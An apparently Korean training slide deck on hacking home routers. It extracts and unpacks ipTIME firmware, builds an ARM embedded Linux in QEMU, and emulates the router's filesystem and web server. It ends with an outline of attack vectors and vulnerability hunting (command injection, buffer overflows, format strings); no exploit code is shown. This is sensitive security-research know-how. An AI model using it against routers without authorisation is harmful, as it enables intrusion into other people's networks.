Embedded 시스템 실전 해킹

Home Router Hacking 유무선공유기해킹 mongii@grayhash

Summary 공유기펌웨어이미지획득및구조분석 임베디드시스템개발과정이해 공유기파일시스템추출 QEMU를이용한가상공유기시스템실행 ARM Assembly 및 Exploiting

IPTIME 펌웨어획득 - 업데이트파일다운받기 -

업데이트파일다운받기 http://iptime.com/iptime/?page_id=126

업데이트파일다운받기

펌웨어를획득하는방법들 1. 제조사에서공개하는펌웨어다운로드 2. Programming Interface(ISP, ICSP) 를이용하여추출 3. 자동 / 수동업데이트가될때패킷스니핑 4. UART 디버그포트접속을통한쉘획득후추출 5. 논리적취약점을이용하여 Shell 접근권한획득후추출 6. Flash Memory Desoldering 후물리적덤프 7. JTAG 디버깅포트연결후펌웨어덤프

펌웨어파일전송 (winscp)

Firmware 파일분석 root@ip-172-31-4-170:~/mongii/iptime# ls -al total 1892 drwxr-xr-x 2 root root 4096 Jun 25 15:05. drwxr-xr-x 26 root root 4096 Jun 25 14:52.. -rw-r--r-- 1 root root 1925312 Jun 25 14:47 g104_kr_7_60.bin root@ip-172-31-4-170:~/mongii/iptime# file g104_kr_7_60.bin g104_kr_7_60.bin: data root@ip-172-31-4-170:~/mongii/iptime#

Firmware 파일분석 file strings xxd Hex editor IDA...

Embedded Linux 제작실습

Embedded Linux 의구조 Bootloader OS Kernel Root File System

실습내용 ARM CPU 기반의 Embedded Linux 구축 => Cross Compiler 이용 Bootloader 컴파일및부팅실습 Linux Kernel 컴파일및부팅실습 Root File System 컴파일및부팅실습

Cross Compile 란? 다른 architecture 의실행코드를생성하는것 예 x86 에서 x86 코드컴파일 => Not Cross Compiler ARM 에서 ARM 코드컴파일 => Not Cross Compiler x86 에서 ARM 코드컴파일 => Cross Compiler! x86 에서 MIPS 코드컴파일 => Cross Compiler! Cross Compiler 설치필요

Cross Compiler 설치 대표적인 ARM 용 Cross Compiler 들 CodeSourcery 에서배포 http://sourcery.mentor.com/public/gnu_toolc hain/arm-none-linux-gnueabi/ Android 에서배포 http://developer.android.com/tools/sdk/ndk/i ndex.html uclibc 에서배포 http://www.uclibc.org/downloads/binaries/

Cross Compiler 설치 CodeSourcery Cross Compiler 설치 http://sourcery.mentor.com/public/gnu_toolchain/a rm-none-linux-gnueabi/arm-2014.05-29-arm-nonelinux-gnueabi.bin http://211.189.88.59/temp/arm-2014.05-29-armnone-linux-gnueabi.bin 설치방법 apt-get install libgtk2.0-0:i386 libxtst6:i386 gtk2-enginesmurrine:i386 lib32stdc++6 libxt6:i386 libdbus-glib-1-2:i386 libasound2:i386 unzip gcc chmod +x arm-2014.05-29-arm-none-linux-gnueabi.bin./arm-2014.05-29-arm-none-linux-gnueabi.bin /root/mentographics/ 에설치됨 dash 오류가나기때문에 /bin/sh 를 /bin/bash 로변경 ln -sf /bin/bash /bin/sh

Cross Compiler 설치 CodeSourcery Cross Compiler 설치 Enter 혹은 Y 를계속입력

설치완료 root@ubuntu:~# cd /root/codesourcery/sourcery_codebench_lite_for_arm_gnu_linux root@ubuntu:~/codesourcery/sourcery_codebench_lite_for_arm_gnu_linux# cd bin root@ubuntu:~/codesourcery/sourcery_codebench_lite_for_arm_gnu_linux/bin# root@ubuntu:~/codesourcery/sourcery_codebench_lite_for_arm_gnu_linux/bin# root@ubuntu:~/codesourcery/sourcery_codebench_lite_for_arm_gnu_linux/bin#./armnone-linux-gnueabi-gcc arm-none-linux-gnueabi-gcc: fatal error: no input files compilation terminated. root@ubuntu:~/codesourcery/sourcery_codebench_lite_for_arm_gnu_linux/bin# root@ubuntu:~/codesourcery/sourcery_codebench_lite_for_arm_gnu_linux/bin# PATH = 환경변수에등록 export PATH=$PATH:/root/MentorGraphics/Sourcery_CodeBench_Lite_for_ARM_GNU_Linux/bin /root/.bashrc 에추가

참고 : apt-get 으로설치하기 apt-get install build-essential apt-get install gcc-arm-linux-gnueabihf 주의 : 본 cross compiler 로 u-boot 컴파일시엔 QEMU 로정상로딩되지않는오류발생

BootLoader

부트로더컴파일 부트로더란? 운영체제진입전에실행되는프로그램 하드웨어기본세팅 운영체제커널로딩 펌웨어및메모리읽기 / 쓰기가능 펌웨어업데이트 (network, serial, usb) 멀티부팅기능

대표적인부트로더들 Embedded U-boot Redboot Netboot General LILO Grub

U-boot 설치 # wget ftp://ftp.denx.de/pub/u-boot/u-boot-2010.03.tar.bz2 # bzip2 -d u-boot-2010.03.tar.bz2 # tar xvf u-boot-2010.03.tar # cd u-boot-2010.03 # make versatilepb_config ARCH=arm CROSS_COMPILE=arm-none-linux-gnueabi- # make all ARCH=arm CROSS_COMPILE=arm-none-linux-gnueabi-

Versatile? 널리사용되는 ARM 기반의개발보드

QEMU 가지원하는보드목록 # apt install qemu # qemu-system-arm -M help Supported machines are: none empty machine beagle Beagle board (OMAP3530) beaglexm Beagle board XM (OMAP3630) collie Collie PDA (SA-1110) nuri Samsung NURI board (Exynos4210) smdkc210 Samsung SMDKC210 board (Exynos4210) connex Gumstix Connex (PXA255) verdex Gumstix Verdex (PXA270) highbank Calxeda Highbank (ECX-1000) integratorcp ARM Integrator/CP (ARM926EJ-S) (default) kzm ARM KZM Emulation Baseboard (ARM1136) mainstone Mainstone II (PXA27x) musicpal Marvell 88w8618 / MusicPal (ARM926EJ-S) n800 Nokia N800 tablet aka. RX-34 (OMAP2420) n810 Nokia N810 tablet aka. RX-44 (OMAP2420)

U-boot 실행 root@ubuntu:~/uboot/u-boot-2010.03# qemu-system-arm -M versatilepb -m 128M -nographic -kernel u-boot.bin pulseaudio: pa_context_connect() failed pulseaudio: Reason: Connection refused pulseaudio: Failed to initialize PA contextaudio: Could not init `pa' audio driver U-Boot 2010.03 (Aug 20 2015-13:43:06) DRAM: 0 kb Flash: 64 MB *** Warning - bad CRC, using default environment In: serial Out: serial Err: serial Net: SMC91111-0 VersatilePB # VersatilePB # VersatilePB # help? - alias for 'help' base - print or set address offset bdinfo - print Board Info structure bootm - boot application image from memory bootp - boot image via network using BOOTP/TFTP protocol cmp - memory compare cp - memory copy crc32 - checksum calculation dhcp - boot image via network using DHCP/TFTP protocol

0 번지엔무엇이?

Memory 내의 u-boot image

U-boot 파일살펴보기

QEMU 에서빠져나오기 ctrl+a+x ctrl+a 를먼저한번눌렀다뗀후이어서 x

Kernel

리눅스커널컴파일하기 커널소스코드다운로드 https://www.kernel.org https://cdn.kernel.org/pub/linux/kernel/v4. x/linux-4.1.6.tar.xz root@ubuntu:~/linux_build# xz -d linux-4.1.6.tar.xz root@ubuntu:~/linux_build# root@ubuntu:~/linux_build# ls linux-4.1.6.tar root@ubuntu:~/linux_build# tar xvf linux-4.1.6.tar

리눅스커널컴파일하기 # make ARCH=arm versatile_defconfig # make ARCH=arm menuconfig - apt-get install lib32ncurses5 lib32ncurses5-dev bc // Kernel Features->Use the ARM EABI to compile the kernel 체크확인 # make ARCH=arm CROSS_COMPILE=arm-none-linux-gnueabi- all # find. -name zimage./arch/arm/boot/zimage #

zimage 의구조 출처 : http://bmfrog.tistory.com/m/post/view/id/101

zimage 의구조 vmlinux : 실제커널 piggy.gz : vmlinux 를압축한파일 misc.c : 압축해제수행 head.s : 압축해제된코드로 jump

커널부팅테스트 qemu-system-arm -M versatilepb -m 128M -kernel zimage -nographic -append "console=ttyama0,115200"

Bootloader + Kernel

vi include/configs/versatile.h #define CONFIG_BOOTDELAY 2 #define CONFIG_BOOTARGS "root=/dev/nfs mem=128m ip=dhcp "\ "netdev=25,0,0xf1010000,0xf1010010,eth0" #define CONFIG_BOOTDELAY 2 #define CONFIG_BOOTARGS "root=/dev/ram mem=128m console=ttyama0,115200" #define CONFIG_INITRD_TAG 1 * Ram Disk 방식을이용하여부팅하도록설정수정.

vi common/image.c #if defined(config_b2) defined(config_evb4510) defined(config_armadillo) /* * We need to copy the ramdisk to SRAM to let Linux boot */ if (rd_data) { memmove ((void *)rd_load, (uchar *)rd_data, rd_len); rd_data = rd_load; } #endif #if defined(config_b2) defined(config_evb4510) defined(config_armadillo) defined(config_versatile) /* * We need to copy the ramdisk to SRAM to let Linux boot */ if (rd_data) { memmove ((void *)rd_load, (uchar *)rd_data, rd_len); rd_data = rd_load; } #endif

U-boot 재컴파일 Uboot image 생성

부트로더 + 커널부팅성공 qemu-system-arm -M versatilepb -m 128M -kernel flash.bin -nographic VersatilePB # bootm 0x210000

Root File System

Root File System 루트파일시스템이란? 커널부팅완료후만나게되는파일들 OS 인터페이스 Shell X-Windows 기본프로그램들 Login, passwd, ls, id, ps, netstat 등등.. 라이브러리들 Glibc 등

BusyBox 소개 다양한유틸리티, 프로그램들을하나로통합한패키지프로그램 중복되는부분을제거함으로써용량최소화 임베디드운영체제에서많이사용됨 다운로드 http://busybox.net/downloads/busybox- 1.21.1.tar.bz2

Busybox 컴파일 make ARCH=arm CROSS_COMPILE=arm-none-linux-gnueabi- defconfig make ARCH=arm CROSS_COMPILE=arm-none-linux-gnueabi- menuconfig 컴파일전에옵션변경 Busybox Setting -> Build Option -> Static binary 체크 make ARCH=arm CROSS_COMPILE=arm-none-linux-gnueabiinstall

Busybox 컴파일

기본파일시스템생성 # cd _install/ # find. cpio -o --format=newc >../rootfs.img 3994 blocks # gzip -c../rootfs.img > rootfs.img.gz # cp /root/linux-4.1.6/arch/arm/boot/zimage.

Kernel + RFS 부팅테스트 qemu-system-arm -M versatilepb -m 128M -kernel zimage -initrd rootfs.img.gz -append "root=/dev/ram rdinit=/bin/sh console=ttyama0,115200" -nographic

Network 활성화하기 / # ifconfig eth0 10.0.2.15 netmask 255.255.255.0 / # route add default gw 10.0.2.2 / # / # ifconfig ifconfig: /proc/net/dev: No such file or directory eth0 Link encap:ethernet HWaddr 52:54:00:12:34:56 inet addr:10.0.2.15 Bcast:10.0.2.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 Interrupt:57 Base address:0x8000 DMA chan:ff / # / # telnet 211.189.88.59 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Sat, 12 Aug 2017 14:55:10 GMT Server: Apache/2.2.22 (EL) X-Powered-By: PHP/5.2.17 Connection: close Content-Type: text/html; charset=euc_kr Connection closed by foreign host / #

Bootloader + Kernel + RFS 부팅 uboot/include/configs/versatile.h #define CONFIG_BOOTDELAY 2 #define CONFIG_BOOTARGS "root=/dev/ram rdinit=/bin/sh mem=128m console=ttyama0,115200 #define CONFIG_INITRD_TAG 1 $ make all ARCH=arm CROSS_COMPILE=arm-none-linux-gnueabidd if=/dev/zero of=flash.bin bs=1 count=7m dd if=u-boot.bin of=flash.bin conv=notrunc bs=1 mkimage -A arm -C none -O linux -T kernel -d zimage -a 0x00010000 -e 0x00010000 zimage.uimg dd if=zimage.uimg of=flash.bin conv=notrunc bs=1 seek=2m mkimage -A arm -C none -O linux -T ramdisk -d rootfs.img.gz -a 0x00800000 -e 0x00800000 rootfs.uimg dd if=rootfs.uimg of=flash.bin conv=notrunc bs=1 seek=5m

Bootloader + Kernel + RFS 부팅 qemu-system-arm -M versatilepb -m 128M -kernel flash.bin -nographic VersatilePB # bootm 0x210000 0x510000

자동부팅 uboot/include/configs/versatile.h #define CONFIG_BOOTDELAY 2 #define CONFIG_BOOTARGS "root=/dev/ram rdinit=/bin/sh mem=128m console=ttyama0,115200 #define CONFIG_INITRD_TAG 1 #define CONFIG_BOOTCOMMAND "bootm 0x210000 0x510000" $ make all ARCH=arm CROSS_COMPILE=arm-none-linux-gnueabidd if=/dev/zero of=flash.bin bs=1 count=7m dd if=u-boot.bin of=flash.bin conv=notrunc bs=1 mkimage -A arm -C none -O linux -T kernel -d zimage -a 0x00010000 -e 0x00010000 zimage.uimg dd if=zimage.uimg of=flash.bin conv=notrunc bs=1 seek=2m mkimage -A arm -C none -O linux -T ramdisk -d rootfs.img.gz -a 0x00800000 -e 0x00800000 rootfs.uimg dd if=rootfs.uimg of=flash.bin conv=notrunc bs=1 seek=5m

자동부팅

리눅스배포본이란? 기본리눅스커널을기반위에어떤 Root File System 및 Interface 를구성하느냐에따라서로다른배포본이된다. Ubuntu Linux Fedora Linux Android Linux

QEMU 에 android 올리기 http://blackzaket.blog.me/80100937415 http://www.kandroid.org/board/board.php?board=androidporting&sor t=hit&shwhere=subject&command=body&no=240

실제장비에넣기 http://www.arm.com/products/tools/developmentboards/versatile/platform-baseboards.php

실제장비에넣기 ROM Writer Writing 전용장비 Flash memory 에 writing JTAG 하드웨어디버깅장비 Flash memory 에 writing

공유기 Firmware 분석하기

Embedded Linux 의구조 Bootloader OS Kernel Root File System

Firmware 자동분석툴 Binwalk (Firmware Analysis Tool) 펌웨어파일의구성분석 펌웨어분석의원리 Signature 탐색 Ex> squashfs == hsqs http://binwalk.org/ apt-get install binwalk FMK (Firmware Mod Kit) 펌웨어파일내에서각종파일추출 혹은수정된파일을기반으로새펌웨어빌드 https://code.google.com/p/firmware-mod-kit/

binwalk root@ip-172-31-4-170:~/mongii/iptime# binwalk g104_kr_7_60.bin DECIMAL HEX DESCRIPTION ------------------------------------------------------------------ ------------------------------------- 65592 0x10038 gzip compressed data, was "i.tmp", from Unix, last modified: Tue Apr 12 07:55:31 2011 720896 0xB0000 Squashfs filesystem, little endian, version 3.0, size: 1201395 bytes, 243 inodes, blocksize: 65536 bytes, created: Tue Apr 12 07:55:31 2011 root@ip-172-31-4-170:~/mongii/iptime#

Bootloader 분석

Binwalk 결과재확인 root@ip-172-31-4-170:~/mongii/iptime# binwalk g104_kr_7_60.bin DECIMAL HEX DESCRIPTION ------------------------------------------------------------------ ------------------------------------- 65592 0x10038 gzip compressed data, was "i.tmp", from Unix, last modified: Tue Apr 12 07:55:31 2011 720896 0xB0000 Squashfs filesystem, little endian, version 3.0, size: 1201395 bytes, 243 inodes, blocksize: 65536 bytes, created: Tue Apr 12 07:55:31 2011 root@ip-172-31-4-170:~/mongii/iptime# * Offset 이 65592 라는말은그앞에무언가가더있다라는것을의미함

펌웨어의시작부분

Bootloader 분석 root@ip-172-31-4-170:~/mongii/iptime# dd if=./g104_kr_7_60.bin of=./bootloader count=65592 bs=1 65592+0 records in 65592+0 records out 65592 bytes (66 kb) copied, 0.07132 s, 920 kb/s root@ip-172-31-4-170:~/mongii/iptime# root@ip-172-31-4-170:~/mongii/iptime# xxd bootloader 0000000: d7f0 29e3 01d4 a0e3 dbf0 29e3 dcd1 9fe5..)...)... 0000010: d2f0 29e3 d8d1 9fe5 d841 9fe5 0159 a0e3..)...a...y.. 0000020: 0450 85e0 d081 9fe5 0080 85e5 cc51 9fe5.P...Q.. 0000030: 0450 85e0 c881 9fe5 0080 85e5 c451 9fe5.P...Q.. 000fff0: 0000 0000 0000 0000 0000 0000 0000 0000... 0010000: 6731 3034 0000 0000 372e 3630 0000 0000 g104...7.60... 0010010: 5475 6520 4170 7220 3132 2031 363a 3535 Tue Apr 12 16:55 0010020: 3a33 3120 3230 3131 0a00 0000 0000 0b00 :31 2011... 0010030: c85f 1c00 b1f0 860e._... root@ip-172-31-4-170:~/mongii/iptime#

Bootloader 분석

IDA 로 Bootloader 확인

Kernel 분석

Kernel 의구조 출처 : http://bmfrog.tistory.com/m/post/view/id/101

Extraction root@ip-172-31-4-170:~/mongii/iptime# dd skip=65592 if=./g104_kr_7_60.bin of=./i.tmp.gz bs=1 1859720+0 records in 1859720+0 records out 1859720 bytes (1.9 MB) copied, 2.05117 s, 907 kb/s root@ip-172-31-4-170:~/mongii/iptime# root@ip-172-31-4-170:~/mongii/iptime# file i.tmp.gz i.tmp.gz: gzip compressed data, was "i.tmp", from Unix, last modified: Tue Apr 12 07:55:31 2011 root@ip-172-31-4-170:~/mongii/iptime# root@ip-172-31-4-170:~/mongii/iptime# ls -al total 3780 drwxr-xr-x 2 root root 4096 Jun 25 15:11. drwxr-xr-x 26 root root 4096 Jun 25 14:52.. -rw-r--r-- 1 root root 65592 Jun 25 15:09 bootloader -rw-r--r-- 1 root root 1925312 Jun 25 14:47 g104_kr_7_60.bin -rw-r--r-- 1 root root 1859720 Jun 25 15:11 i.tmp.gz root@ip-172-31-4-170:~/mongii/iptime#

-e : extraction root@ubuntu:~/iptime_firmware# binwalk --help Binwalk v1.0 Craig Heffner, http://www.devttys0.com Usage: binwalk [OPTIONS] [FILE1] [FILE2] [FILE3]... -o, --offset=<int> Start scan at this file offset -l, --length=<int> Number of bytes to scan -b, --align=<int> Set byte alignment [default: 1] -m, --magic=<file> Specify an alternate magic file to use -i, --include=<filter> Include matches that are normally excluded and that have <filter> in their description -x, --exclude=<filter> Exclude matches that have <filter> in their description -y, --search=<filter> Only search for matches that have <filter> in their description -g, --grep=<text> Grep results for the specified text -R, --raw-bytes=<string> Search for a sequence of raw bytes instead of using the default magic signatures -f, --file=<file> Log results to file -D, --dd=<type:ext[:cmd]> Extract entries whose descriptions match <type>, give them file extension <ext>, and execute <cmd> -e, --extract=[file] Automatically extract known file types. Load rules from file, if specified. -r, --rm Cleanup extracted files and zero-size files -d, --delay Delay file extraction for files with known footers -a, --all Include all short signatures -I, --show-invalid Show results marked as invalid -A, --opcodes Scan for executable code -C, --cast Cast file contents as various data types -k, --keep-going Show all matching results at a given offset, not just the first one -q, --quiet Supress output to stdout -v, --verbose Be verbose (specify twice for very verbose) -u, --update Update magic signature files -h, --help Show help output root@ubuntu:~/iptime_firmware#

i.tmp.gz 분석

i.tmp.gz 분석 http://andromedarabbit.net/project/zip/gzipfileformat.html

gzip d i.tmp.gz i.tmp 분석

문자열확인 gzip 해제코드가들어있는것을알수있음 misc.c

헤더로추정되는값삭제

IDA 로확인 piggy.gz 압축해제코드

i.tmp 의구조 root@ip-172-31-4-170:~/mongii/iptime# binwalk i.tmp DECIMAL HEX DESCRIPTION ------------------------------------------------------------------------------------ ------------------- 11936 0x2EA0 gzip compressed data, from Unix, last modified: Thu Apr 15 01:49:36 2010, max compression 655664 0xA0130 gzip compressed data, was "initrd", from Unix, last modified: Tue Apr 12 07:55:27 2011, max compression root@ip-172-31-4-170:~/mongii/iptime#

i.tmp 의구조 Iptime 의부트로더에서사용하는이미지파일 kernel 과 initrd 를포함하고있다.

Root File System 파일추출

Initrd 추출 binwalk -e i.tmp # file initrd initrd: Linux rev 1.0 ext2 filesystem data (mounted or unclean), UUID=fbc0cc35-5c72-4ef0-bc05-5d6b9bdc8e50 mkdir FILE_SYSTEM mount initrd./file_system

Initrd 추출 root@ip-172-31-4-170:~/mongii/iptime# cd FILE_SYSTEM/ root@ip-172-31-4-170:~/mongii/iptime/file_system# ls -al total 26 drwxr-xr-x 12 root root 1024 Apr 12 2011. drwxr-xr-x 3 root root 4096 Jun 25 15:22.. lrwxrwxrwx 1 root root 11 Apr 12 2011 bin -> /cramfs/bin drwxr-xr-x 2 510 504 1024 Apr 12 2011 cramfs drwxr-xr-x 3 510 504 1024 Apr 12 2011 dev drwxr-xr-x 5 510 504 1024 Apr 12 2011 etc drwxr-xr-x 3 510 504 1024 Apr 12 2011 home lrwxrwxrwx 1 root root 11 Apr 12 2011 lib -> /cramfs/lib drwx------ 2 root root 12288 Apr 12 2011 lost+found lrwxrwxrwx 1 root root 13 Apr 12 2011 ndbin -> /cramfs/ndbin drwxr-xr-x 2 510 504 1024 Apr 12 2011 proc drwxr-xr-x 2 510 504 1024 Apr 12 2011 save lrwxrwxrwx 1 root root 12 Apr 12 2011 sbin -> /cramfs/sbin drwxr-xr-x 2 510 504 1024 Apr 12 2011 tmp drwxr-xr-x 2 510 504 1024 Apr 12 2011 upgrade-bin lrwxrwxrwx 1 root root 11 Apr 12 2011 usr -> /cramfs/usr drwxr-xr-x 5 510 504 1024 Apr 12 2011 var root@ip-172-31-4-170:~/mongii/iptime/file_system#

Extraction root@ip-172-31-4-170:~/mongii/iptime# dd skip=720896 if=./g104_kr_7_60.bin of=./rfs.bin bs=1 1204416+0 records in 1204416+0 records out 1204416 bytes (1.2 MB) copied, 1.33462 s, 902 kb/s root@ip-172-31-4-170:~/mongii/iptime# root@ubuntu:~/iptime_firmware# file RFS.bin RFS.bin: Squashfs filesystem, little endian, version 3.0, 1201395 bytes, 243 inodes, blocksize: 65536 bytes, created: Tue Apr 12 07:55:31 2011 root@ubuntu:~/iptime_firmware# root@ubuntu:~/iptime_firmware# root@ubuntu:~/iptime_firmware# ls -al RFS.bin -rw-r--r-- 1 root root 1204416 Jun 25 15:24 RFS.bin root@ubuntu:~/iptime_firmware# root@ubuntu:~/iptime_firmware#

Firmware-mod-kit https://storage.googleapis.com/google-code-archivedownloads/v2/code.google.com/firmware-mod-kit/fmk_099.tar.gz

FMK 설치 # apt-get install git build-essential zlib1g-dev liblzma-dev python-magic tar xvfz fmk_099.tar.gz cd fmk/src./configure make cd..

Squashfs 추출 root@ip-172-31-4-170:~/mongii/fmk/fmk#./unsquashfs_all.sh RFS.bin (B0000.squashfs) Attempting to extract SquashFS.X file system... Trying./src/squashfs-2.1-r2/unsquashfs-lzma... Trying./src/squashfs-2.1-r2/unsquashfs... Trying./src/squashfs-3.0/unsquashfs-lzma... created 173 files created 17 directories created 53 symlinks created 0 devices created 0 fifos File system sucessfully extracted! MKFS="./src/squashfs-3.0/mksquashfs-lzma" root@ip-172-31-4-170:~/mongii/fmk/fmk#

파일시스템추출결과 root@ip-172-31-4-170:~/mongii/fmk/fmk# cd squashfs-root/ root@ip-172-31-4-170:~/mongii/fmk/fmk/squashfs-root# ls -al total 40 drwxr-xr-x 10 root root 4096 Apr 12 2011. drwxrwxr-x 5 ubuntu ubuntu 4096 Jun 25 15:28.. drwxr-xr-x 3 510 504 4096 Apr 12 2011 bin drwxr-xr-x 2 510 504 4096 Apr 12 2011 help drwxr-xr-x 2 root root 4096 Apr 12 2011 images2 drwxr-xr-x 2 510 504 4096 Apr 12 2011 js drwxr-xr-x 3 510 504 4096 Apr 12 2011 lib drwxr-xr-x 2 510 504 4096 Apr 12 2011 ndbin drwxr-xr-x 2 510 504 4096 Apr 12 2011 sbin drwxr-xr-x 4 510 504 4096 Apr 12 2011 usr root@ip-172-31-4-170:~/mongii/fmk/fmk/squashfs-root#

Iptime 펌웨어의구조 압축해제및부트로더이미지참조 Boot Loader i.tmp.gz Squashfs kernel (zimage) Initrd (ext2) /cramfs/ 에마운트 Root File System

파일시스템복원 initrd 마운트 mount initrd FILE_SYSTEM Squashfs 파일추출 unsquashfs_all.sh B0000.squashfs 합치기 mkdir ALL_FILE_SYSTEM cd ALL_FILE_SYSTEM - cp XXX/FILE_SYSTEM/*. Rfpd - cp YYY/squashfs-root/*./cramfs/ -Rfpd

파일시스템복원

Qemu 로돌리기 root@ip-172-31-4-170:~/mongii/fmk/fmk/squashfs-root/bin# qemu-arm -L.././busybox BusyBox v0.60.4 (2011.04.12-07:54+0000) multi-call binary Usage: busybox [function] [arguments]... or: [function] [arguments]... BusyBox is a multi-call binary that combines many common Unix utilities into a single executable. Most people will create a link to busybox for each function they wish to use, and BusyBox will act like whatever it was invoked as. Currently defined functions: busybox, cat, chmod, cp, df, echo, gunzip, gzip, ifconfig, insmod, kill, lash, ln, ls, lsmod, mkdir, mknod, mount, mv, ps, reboot, rm, rmmod, route, sh, sync, umount, zcat root@ip-172-31-4-170:~/mongii/fmk/fmk/squashfs-root/bin#

Qemu 로돌리기 root@ubuntu:~/iptime_firmware/squashfs-root/bin# qemu-arm -L.././busybox ifconfig eth0 Link encap:ethernet HWaddr 00:0C:29:9A:54:2E inet addr:192.168.0.100 Bcast:192.168.0.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:469580 errors:0 dropped:0 overruns:0 frame:0 TX packets:529023 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:82662221 (78.8 MiB) TX bytes:170072676 (162.1 MiB) Interrupt:19 Base address:0x2000 lo Link encap:local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 ib) TX bytes:0 (0.0 ib) root@ubuntu:~/iptime_firmware/squashfs-root/bin#

Qemu 로돌리기 root@ip-172-31-4-170:~/mongii/fmk/fmk/squashfs-root/bin# qemu-arm -L.././timepro.cgi Content-type: text/html; charset=euc-kr <html> <script> if( ipstr == '151.35583.255.199') { return document.getelementsbyname(ip+4)[0]; } return 0; } </script> <head><title> </title> <style></style></head> </html> root@ip-172-31-4-170:~/mongii/fmk/fmk/squashfs-root/bin#

가상 IPTIME 시스템 cd 구성한 IPTIME 파일시스템경로 # find. cpio -o --format=newc >../rootfs.img gzip -c../rootfs.img > rootfs.img.gz zimage : 앞서실습을통해만든 zimage 파일 iptime 펌웨어에서추출한 zimage 는보드호환이되지않음 qemu-system-arm -M versatilepb -m 128M -kernel zimage -initrd rootfs.img.gz -append "root=/dev/ram rdinit=/bin/sh console=ttyama0,115200" -nographic mount -t proc /proc /proc ps -aux

가상 IPTIME 시스템 Uncompressing Linux... done, booting the kernel. Booting Linux on physical CPU 0x0 Linux version 4.1.6 (root@ubuntu) (gcc version 4.4.1 (Sourcery G++ Lite 2009q3-67) ) #1 Thu Aug 20 17:46:08 KST 2015 CPU: ARM926EJ-S [41069265] revision 5 (ARMv5TEJ), cr=00093177 CPU: VIVT data cache, VIVT instruction cache Machine: ARM-Versatile PB Memory policy: Data cache writeback sched_clock: 32 bits at 24MHz, resolution 41ns, wraps every 89478484971ns Built 1 zonelists in Zone order, mobility grouping on. Total pages: 32512 Kernel command line: root=/dev/ram rdinit=/bin/sh console=ttyama0,115200 PID hash table entries: 512 (order: -1, 2048 bytes) Dentry cache hash table entries: 16384 (order: 4, 65536 bytes) Inode-cache hash table entries: 8192 (order: 3, 32768 bytes) Memory: 121596K/131072K available (3209K kernel code, 139K rwdata, 796K rodata, 120K init, 119K bss, 9476K reserved, 0K cma-reserved) Virtual kernel memory layout: vector : 0xffff0000-0xffff1000 ( 4 kb) fixmap : 0xffc00000-0xfff00000 (3072 kb) vmalloc : 0xc8800000-0xff000000 ( 872 MB) lowmem : 0xc0000000-0xc8000000 ( 128 MB) modules : 0xbf000000-0xc0000000 ( 16 MB).text : 0xc0008000-0xc03f1944 (4007 kb).init : 0xc03f2000-0xc0410000 ( 120 kb).data : 0xc0410000-0xc0432e00 ( 140 kb).bss : 0xc0432e00-0xc0450d04 ( 120 kb) NR_IRQS:224... BusyBox v0.60.4 (2015.08.11-09:18+0000) Built-in shell (lash) Enter 'help' for a list of built-in commands. input: AT Raw Set 2 keyboard as /devices/fpga:06/serio0/input/input0 / # input: ImExPS/2 Generic Explorer Mouse as /devices/fpga:07/serio1/input/input2 / #

Network 활성화 root@grayhash:~/all_file_system# qemu-system-arm -M versatilepb -m 128M -kernel zimage - initrd rootfs.img.gz -append "root=/dev/ram rdinit=/bin/sh console=ttyama0,115200" -nographic - redir tcp:8080::80 / # / # busybox ifconfig eth0 10.0.2.15 netmask 255.255.255.0 smc91x smc91x.0 eth0: link up / # busybox route add default gw 10.0.2.2 / # / # cd /sbin /cramfs/sbin #./httpd /cramfs/sbin #

관리자페이지접속

공유기취약점탐지전략

유무선공유기의공격벡터들 공유기관리페이지 Ex> http://192.168.0.1 웹해킹 (ex. Shell command execution) CGI 해킹 (ex. Memory corruption) 공유기원격서비스공격 Ex> dhcpd, webserver, ftpserver, SNMP, VPN

취약점탐지전략 디렉토리구성파악 사용자의입력을받는대상파악 주요취약점존재여부분석 논리적취약점 버퍼오버플로우 포맷스트링 Debugging Exploit!

디렉토리구조 / # ls -al lrwxrwxrwx 1 0 0 11 usr -> /cramfs/usr lrwxrwxrwx 1 0 0 13 ndbin -> /cramfs/ndbin lrwxrwxrwx 1 0 0 11 bin -> /cramfs/bin lrwxrwxrwx 1 0 0 12 sbin -> /cramfs/sbin lrwxrwxrwx 1 0 0 11 lib -> /cramfs/lib drwxr-xr-x 7 510 504 1024 var drwxr-xr-x 2 510 504 1024 upgrade-bin drwxr-xr-x 1 0 0 0 tmp drwxr-xr-x 2 0 0 1024 save dr-xr-xr-x 32 0 0 0 proc drwxr-xr-x 3 510 504 1024 home drwxr-xr-x 5 510 504 1024 etc drwxr-xr-x 3 510 504 1024 dev drwxr-xr-x 10 0 0 83 cramfs drwxr-xr-x 11 0 0 1024.. drwxr-xr-x 11 0 0 1024. / #

부팅과정분석 /etc/init.d/rcs #!/bin/sh mount -t proc /proc /proc echo 1 >> /proc/sys/net/ipv4/ip_forward /sbin/inittime /sbin/inittime 공유기상태진단 공유기초기화작업수행 각종서비스실행

프로세스목록 /var # ps PID TTY Uid Size State Command 1 root 768 S init 2 root 0 S [keventd] 3 root 0 S [ksoftirqd_cpu0] 4 root 0 S [kswapd] 5 root 0 S [bdflush] 6 root 0 S [kupdated] 7 root 0 S [mtdblockd] 30 root 0 S [polling] 103 root 0 D [insmod] 254 root 588 S upnpd 269 root 760 S httpd 271 root 564 S /sbin/dhcpd 276 root 496 S /sbin/pptpd -b br0 278 root 736 S apcpd 280 root 736 S /sbin/iptables-q 282 root 544 S /sbin/dhclient -i eth1 -p dhclient.eth1 700 root 492 R ps /var #

